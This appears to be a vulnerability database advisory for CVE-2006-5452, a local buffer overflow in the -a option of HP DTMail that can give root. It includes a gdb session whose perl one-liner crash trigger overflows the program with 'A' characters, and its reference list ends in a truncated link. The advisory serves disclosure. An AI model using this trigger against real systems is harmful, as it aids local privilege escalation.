HP DTMail Attachment -a Option Argument Buffer Overflow Vulnerability

Vulnerability ID: 1193097    Vulnerability type: Buffer overflow
Published: 2006-10-23    Updated: 2009-03-04
CVE ID: CVE-2006-5452    CNNVD-ID: CNNVD-200610-382
Affected platform: N/A    CVSS score: 4.6
|Vulnerability Source
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-382
|Vulnerability Details
HP DTMail is a mail client used on the desktop. DTMail has a buffer overflow in its handling of the argument to the -a option, which a local attacker can exploit to gain root privileges. The following gdb output shows the vulnerability:

(gdb) r -a -a `perl -e 'print "A" x 9000'`
Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140

|References

Source: XF
Name: dtmail-tru64-bo(29644)
Link: http://xforce.iss.net/xforce/xfdb/29644
Source: SECTRACK
Name: 1017099
Link: http://securitytracker.com/id?1017099
Source: SECTRACK
Name: 1017098
Link: http://securitytracker.com/id?1017098
Source: HP
Name: HPSBUX02162
Link: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091
Source: MISC
Link: http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt
Source: SECTRACK
Name: 1017083
Link: http://securitytracker.com/id?1017083
Source: OVAL
Name: oval:org.mitre.oval:def:5175
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5175
Source: BID
Name: 20580
Link: http://www.securityfocus.com/bid/20580
Source: HP
Name: HPSBTU02163
Link: http://www.securityfocus.com/archive/1/archive/1/449321/100/0/threaded
Source: VUPEN
Name: ADV-2006-4140
Link: http://www.frsirt.com/english/advisories/2006/4140
Source: VUPEN
Name: ADV-2006-4139
Link: http://www.frsirt.com/english/advisories/2006/4139
Source: SECUNIA
Name: 22528
Link: http://secunia.com/advisories/22528
Source: SECUNIA
Name: 22451
Link: http://secunia.com/advisories/224